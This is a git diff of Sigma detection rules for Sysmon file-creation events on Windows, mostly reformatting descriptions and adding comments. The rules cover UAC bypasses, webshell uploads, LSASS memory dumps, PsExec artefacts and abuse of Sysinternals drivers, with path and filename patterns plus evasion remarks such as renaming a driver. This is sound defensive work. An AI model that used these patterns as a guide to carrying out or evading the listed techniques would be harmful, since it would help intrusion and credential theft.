+ This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
references:
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
author: xknow (@xknow_infosec), xorxes (@xor_xes)
@@ -36,8 +31,6 @@ detection:
- \procmon.exe
condition: file_event and (selection and not filter)
falsepositives:
- - Other legimate tools using this driver and filename (like Sysinternals). Note
- - Clever attackers may easily bypass this detection by just renaming the driver
- filename. Therefore just Medium-level and don't rely on it.
+ - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml b/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml
index 60169f68f..ae6e3a929 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml
@@ -1,11 +1,10 @@
title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca
related:
- - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0
- type: derived
+ - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0
+ type: derived
status: experimental
-description: Detects file write event from/to a fake recycle bin folder that is often
- used as a staging directory for malware
+description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
references:
- https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
- https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
@@ -24,12 +23,14 @@ detection:
EventID: 11
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|contains:
- RECYCLERS.BIN\
- RECYCLER.BIN\
- - TargetFilename|contains:
- RECYCLERS.BIN\
- RECYCLER.BIN\
+ - Image|contains:
+ # e.g. C:\$RECYCLER.BIN
+ - RECYCLERS.BIN\
+ - RECYCLER.BIN\
+ - TargetFilename|contains:
+ # e.g. C:\$RECYCLER.BIN
+ - RECYCLERS.BIN\
+ - RECYCLER.BIN\
condition: file_event and selection
falsepositives:
- Unknown
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml b/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
index 50c36bfba..df06a8671 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
@@ -1,8 +1,7 @@
title: Drop Binaries Into Spool Drivers Color Folder
id: ce7066a6-508a-42d3-995b-2952c65dc2ce
status: test
-description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\"
- as seen in the blog referenced below
+description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
references:
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml
index f35fefe7b..5fa87bc66 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml
@@ -1,11 +1,10 @@
title: Suspicious Startup Folder Persistence
id: 28208707-fe31-437f-9a7f-4b1108b94d2e
related:
- - id: 2aa0a6b4-a865-495b-ab51-c28249537b75
- type: similar
+ - id: 2aa0a6b4-a865-495b-ab51-c28249537b75
+ type: similar
status: test
-description: Detects when a file with a suspicious extension is created in the startup
- folder
+description: Detects when a file with a suspicious extension is created in the startup folder
references:
- https://github.com/last-byte/PersistenceSniper
author: Nasreddine Bencherchali (Nextron Systems)
@@ -25,6 +24,7 @@ detection:
selection:
TargetFilename|contains: \Windows\Start Menu\Programs\Startup\
TargetFilename|endswith:
+ # Add or remove suspicious extensions according to your env needs
- .vbs
- .vbe
- .bat
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml b/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml
index 192a9b816..6402dcc06 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml
@@ -1,8 +1,7 @@
title: Suspicious Interactive PowerShell as SYSTEM
id: 5b40a734-99b6-4b98-a1d0-1cea51a08ab2
status: test
-description: Detects the creation of files that indicator an interactive use of PowerShell
- in the SYSTEM user context
+description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm
author: Florian Roth (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml
index c6cb67940..eaa1ad1d5 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_task_write.yml
@@ -1,8 +1,7 @@
title: Suspicious Scheduled Task Write to System32 Tasks
id: 80e1f67a-4596-4351-98f5-a9c3efabac95
status: test
-description: Detects the creation of tasks from processes executed from suspicious
- locations
+description: Detects the creation of tasks from processes executed from suspicious locations
references:
- Internal Research
author: Florian Roth (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
index f214f9167..c715e550c 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
@@ -1,12 +1,10 @@
title: VsCode Powershell Profile Modification
id: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502
related:
- - id: b5b78988-486d-4a80-b991-930eff3ff8bf
- type: similar
+ - id: b5b78988-486d-4a80-b991-930eff3ff8bf
+ type: similar
status: test
-description: Detects the creation or modification of a vscode related powershell profile
- which could indicate suspicious activity as the profile can be used as a mean
- of persistence
+description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
references:
- https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml
index 659fe676e..9b914b2c3 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml
@@ -1,8 +1,7 @@
title: Windows Terminal Profile Settings Modification By Uncommon Process
id: 9b64de98-9db3-4033-bd7a-f51430105f00
status: experimental
-description: Detects the creation or modification of the Windows Terminal Profile
- settings file "settings.json" by an uncommon process.
+description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile
- https://twitter.com/nas_bench/status/1550836225652686848
@@ -21,6 +20,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith:
+ # Note: Add other potential common applications
- \cmd.exe
- \cscript.exe
- \mshta.exe
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml
index 8619c7c5d..c75a7fbb4 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml
@@ -1,8 +1,8 @@
title: WinSxS Executable File Creation By Non-System Process
id: 34746e8c-5fb8-415a-b135-0abc167e912a
related:
- - id: 64827580-e4c3-4c64-97eb-c72325d45399
- type: derived
+ - id: 64827580-e4c3-4c64-97eb-c72325d45399
+ type: derived
status: experimental
description: Detects the creation of binaries in the WinSxS folder by non-system processes
references:
diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml
index b7fbae202..57e705f19 100644
--- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml
@@ -1,8 +1,7 @@
title: LiveKD Kernel Memory Dump File Created
id: 814ddeca-3d31-4265-8e07-8cc54fb44903
status: experimental
-description: Detects the creation of a file that has the same name as the default
- LiveKD kernel memory dump.
+description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
@@ -22,8 +21,6 @@ detection:
TargetFilename: C:\Windows\livekd.dmp
condition: file_event and selection
falsepositives:
- - In rare occasions administrators might leverage LiveKD to perform live kernel
- debugging. This should not be allowed on production systems. Investigate and
- apply additional filters where necessary.
+ - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml
index 848538ee1..0eb6892d5 100644
--- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml
@@ -1,8 +1,7 @@
title: LiveKD Driver Creation
id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352
status: experimental
-description: Detects the creation of the LiveKD driver, which is used for live kernel
- debugging
+description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml
index 05560631c..3e149baea 100644
--- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml
@@ -1,11 +1,10 @@ title: LiveKD Driver Creation By Uncommon Process id: 059c5af9-5131-4d8d-92b2-de4ad6146712 related: - - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352 - type: similar + - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352 + type: similar status: experimental -description: Detects the creation of the LiveKD driver by a process image other than - "livekd.exe". +description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -29,7 +28,6 @@ detection: - \livek64.exe condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - Administrators might rename LiveKD before its usage which could trigger this. - Add additional names you use to the filter + - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml index 066504356..68d75774c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml 
@@ -1,14 +1,9 @@ title: Process Explorer Driver Creation By Non-Sysinternals Binary id: de46c52b-0bf8-4936-a327-aace94f94ac6 status: experimental -description: 'Detects creation of the Process Explorer drivers by processes other - than Process Explorer (procexp) itself. - - Hack tools or malware may use the Process Explorer driver to elevate privileges, - drops it to disk for a few moments, runs a service using that driver and removes - it afterwards. - - ' +description: | + Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. + Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer - https://github.com/Yaxser/Backstab diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml index 1c49b2fda..49bc13398 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml @@ -1,8 +1,7 @@ title: Process Monitor Driver Creation By Non-Sysinternals Binary id: a05baa88-e922-4001-bc4d-8738135f27de status: experimental -description: Detects creation of the Process Monitor driver by processes other than - Process Monitor (procmon) itself. +description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml index 1e08d18ba..d73ca8337 100644 
--- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml @@ -1,11 +1,10 @@ title: PsExec Service File Creation id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: test -description: Detects default PsExec service filename which indicates PsExec service - installation and execution +description: Detects default PsExec service filename which indicates PsExec service installation and execution references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet diff --git a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml index 3113c325d..a848a6378 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml @@ -1,9 +1,7 @@ title: PSEXEC Remote Execution File Artefact id: 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 status: test -description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec - command is executed. It gets written to the file system and will be recorded in - the USN Journal on the target system +description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system references: - https://aboutdfir.com/the-key-to-identify-psexec/ - https://twitter.com/davisrichardg/status/1616518800584704028 
diff --git a/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml b/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml index 7391027aa..0f3768354 100644 --- a/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation Attempt Via .Exe.Local Technique id: 07a99744-56ac-40d2-97b7-2095967b0e03 status: test -description: Detects potential privilege escalation attempt via the creation of the - "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" +description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt diff --git a/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml b/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml index 23a5ae849..f75708e0e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml @@ -1,9 +1,7 @@ title: LSASS Process Memory Dump Creation Via Taskmgr.EXE id: 69ca12af-119d-44ed-b50f-a47af0ebc364 status: experimental -description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This - indicates a manual dumping of the LSASS.exe process memory using Windows Task - Manager. +description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. author: Swachchhanda Shrawan Poudel date: 2023/10/19 references: 
@@ -29,7 +27,6 @@ detection: - .DMP condition: file_event and selection falsepositives: - - Rare case of troubleshooting by an administrator or support that has to be investigated - regardless + - Rare case of troubleshooting by an administrator or support that has to be investigated regardless level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml b/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml index b3d5a3ab1..e4873bbe0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml +++ b/sigma/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml @@ -1,8 +1,7 @@ title: Hijack Legit RDP Session to Move Laterally id: 52753ea4-b3a0-4365-910d-36cff487b789 status: test -description: Detects the usage of tsclient share to place a backdoor on the RDP source - machine's startup folder +description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder author: Samir Bousseaden date: 2019/02/21 modified: 2021/11/27 diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml index 7d0ff14d4..e3a82eeea 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Consent and Comctl32 - File id: 62ed5b55-f991-406a-85d9-e8e8fdf18789 status: test -description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll - (UACMe 22) +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) 
diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml index caf1c36a2..7d646efa7 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using .NET Code Profiler on MMC id: 93a19907-d4f9-4deb-9f91-aac4692776a6 status: test -description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe - DLL hijacking (UACMe 39) +description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml index f55769198..aac96e402 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml @@ -22,6 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: + # Removed the start just in case the logging backend doesn't expand ENV variables when they're used - \Microsoft\Event Viewer\RecentViews - \Microsoft\EventV~1\RecentViews filter: diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml index 71d41192a..bdc6963e3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Using IDiagnostic Profile - File id: 48ea844d-19b1-4642-944e-fe39c2cc1fec status: test -description: Detects the creation of a file by "dllhost.exe" in System32 directory - part of "IDiagnosticProfileUAC" UAC bypass technique +description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique references: - https://github.com/Wh04m1001/IDiagnosticProfileUAC author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml index 5301e6041..07ab95ecd 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using NTFS Reparse Point - File id: 7fff6773-2baa-46de-a24a-b6eec1aba2d1 status: test -description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe - DLL hijacking (UACMe 36) +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml index 7b1ebb4fd..b5384ae8c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - File id: 155dbf56-e0a4-4dd0-8905-8a98705045e8 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml index f4b15dadc..099563d5c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml +++ b/sigma/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - File id: 68578b43-65df-4f81-9a9b-92f32711a951 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml b/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml index 082a26821..c78f07854 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml 
@@ -1,12 +1,9 @@ title: VHD Image Download Via Browser id: 8468111a-ef07-4654-903b-b863a80bbc95 status: test -description: 'Detects creation of ".vhd"/".vhdx" files by browser processes. - - Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads - and evade security controls. - - ' +description: | + Detects creation of ".vhd"/".vhdx" files by browser processes. + Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ @@ -40,6 +37,7 @@ detection: - \seamonkey.exe - \vivaldi.exe - \whale.exe + # We don't use "endswith" to also match with ADS logs and ".vhdx". Example: "TargetFilename: C:\Users\xxx\Downloads\windows.vhd:Zone.Identifier" TargetFilename|contains: .vhd condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml index 3f5f489c5..69cd7e30b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml @@ -1,10 +1,8 @@ title: Visual Studio Code Tunnel Remote File Creation id: 56e05d41-ce99-4ecd-912d-93f019ee0b71 status: experimental -description: 'Detects the creation of file by the "node.exe" process in the ".vscode-server" - directory. Could be a sign of remote file creation via VsCode tunnel feature - - ' +description: | + Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml index d60a50a34..8febf22ce 100644 --- a/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml @@ -1,11 +1,8 @@ title: Renamed VsCode Code Tunnel Execution - File Indicator id: d102b8f5-61dc-4e68-bd83-9a3187c67377 status: experimental -description: 'Detects the creation of a file with the name "code_tunnel.json" which - indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" - other than VsCode. - - ' +description: | + Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -24,6 +21,7 @@ detection: selection: TargetFilename|endswith: \code_tunnel.json filter_main_legit_name: + # Note: There might be other legitimate names for VsCode. Please add them if found Image|endswith: - \code-tunnel.exe - \code.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml b/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml index 9e3c1b8aa..801e22325 100644 --- a/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml +++ b/sigma/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml 
@@ -1,8 +1,7 @@ title: Potential Webshell Creation On Static Website id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 status: test -description: Detects the creation of files with certain extensions on a static web - site. This can be indicative of potential uploads of a web shell. +description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. references: - PT ESC rule and personal experience - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md @@ -35,18 +34,23 @@ detection: - \html\ selection_htdocs_ext: TargetFilename|contains: .ph - filter_main_temp: + # selection_tomcat_path: + # TargetFilename|contains: '\webapps\ROOT' + # selection_tomcat_ext: + # TargetFilename|contains: + # - '.jsp' # .jspx, .jspf + # - '.jsv' + # - '.jsw' + filter_main_temp: # FP when unpacking some executables in $TEMP TargetFilename|contains: - \AppData\Local\Temp\ - \Windows\Temp\ filter_main_system: - Image: System + Image: System # FP when backup/restore from drivers filter_main_legitimate: TargetFilename|contains: \xampp - condition: file_event and ((all of selection_wwwroot_* or all of selection_htdocs_*) - and not 1 of filter_main_*) + condition: file_event and ((all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*) falsepositives: - - Legitimate administrator or developer creating legitimate executable files in - a web application folder + - Legitimate administrator or developer creating legitimate executable files in a web application folder level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml b/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml index dd5faae69..bc3b8bfd4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml 
+++ b/sigma/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml
@@ -1,8 +1,7 @@
title: Creation of an WerFault.exe in Unusual Folder
id: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1
status: test
-description: Detects WerFault copoed to a suspicious folder, which could be a sign
- of WerFault DLL hijacking
+description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
references:
- https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/
author: frack113
diff --git a/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml b/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml
index d73fc1eb5..bf267eaee 100644
--- a/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml
@@ -1,11 +1,10 @@
title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
id: d353dac0-1b41-46c2-820c-d7d2561fc6ed
related:
- - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d
- type: derived
+ - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d
+ type: derived
status: test
-description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via
- winrm.vbs and copied cscript.exe (can be renamed)
+description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
references:
- https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
